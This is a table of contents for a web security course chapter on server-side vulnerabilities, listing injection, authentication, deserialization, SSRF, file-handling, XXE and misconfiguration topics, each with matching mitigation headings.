Web Security and Privacy

  1. Server-Side Vulnerabilities
    1. Injection Attacks
      1. SQL Injection
        1. In-band SQLi
          1. Blind SQLi
            1. Boolean-based
              1. Time-based
              2. Out-of-band SQLi
                1. Mitigation Strategies
                  1. Parameterized Queries
                    1. Prepared Statements
                      1. Use of ORMs
                    2. NoSQL Injection
                      1. Common NoSQL Databases
                        1. Injection Techniques
                          1. Mitigation Strategies
                          2. OS Command Injection
                            1. Command Execution Vulnerabilities
                              1. Prevention Techniques
                              2. LDAP Injection
                                1. LDAP Query Manipulation
                                  1. Mitigation Strategies
                                2. Broken Authentication and Session Management
                                  1. Credential Stuffing
                                    1. Automated Attacks
                                      1. Prevention Techniques
                                      2. Brute-Force Attacks
                                        1. Rate Limiting
                                          1. Account Lockout Policies
                                            1. CAPTCHA Implementation
                                            2. Session Fixation
                                              1. Attack Mechanism
                                                1. Prevention Strategies
                                                2. Insecure Session ID Handling
                                                  1. Predictable Session IDs
                                                    1. Secure Session Storage
                                                    2. Missing Function Level Access Control
                                                      1. Privilege Escalation Risks
                                                        1. Access Control Enforcement
                                                      2. Insecure Deserialization
                                                        1. Serialization Formats
                                                          1. Exploitation Techniques
                                                            1. Prevention Strategies
                                                            2. Server-Side Request Forgery
                                                              1. Internal Network Access
                                                                1. Data Exfiltration
                                                                  1. Mitigation Techniques
                                                                  2. File Handling Vulnerabilities
                                                                    1. Unrestricted File Upload
                                                                      1. File Type Validation
                                                                        1. Storage Location Controls
                                                                        2. Path Traversal
                                                                          1. Directory Structure Disclosure
                                                                            1. Prevention Techniques
                                                                            2. Local File Inclusion
                                                                              1. Exploitation Methods
                                                                                1. Mitigation Strategies
                                                                                2. Remote File Inclusion
                                                                                  1. Remote Code Execution
                                                                                    1. Prevention Techniques
                                                                                  2. XML External Entity Injection
                                                                                    1. XML Parser Vulnerabilities
                                                                                      1. Impact of XXE Attacks
                                                                                        1. Secure XML Parsing
                                                                                        2. Security Misconfiguration
                                                                                          1. Default Credentials
                                                                                            1. Risks and Remediation
                                                                                            2. Verbose Error Messages
                                                                                              1. Information Disclosure
                                                                                                1. Error Handling Best Practices
                                                                                                2. Unpatched Systems
                                                                                                  1. Patch Management
                                                                                                    1. Vulnerability Scanning
                                                                                                    2. Insecure Service Configurations
                                                                                                      1. Disabling Unused Services
                                                                                                        1. Secure Defaults

                                                                                                    Previous

                                                                                                    3. Client-Side Vulnerabilities

                                                                                                    Go to top

                                                                                                    Next

                                                                                                    5. Cryptography in Web Security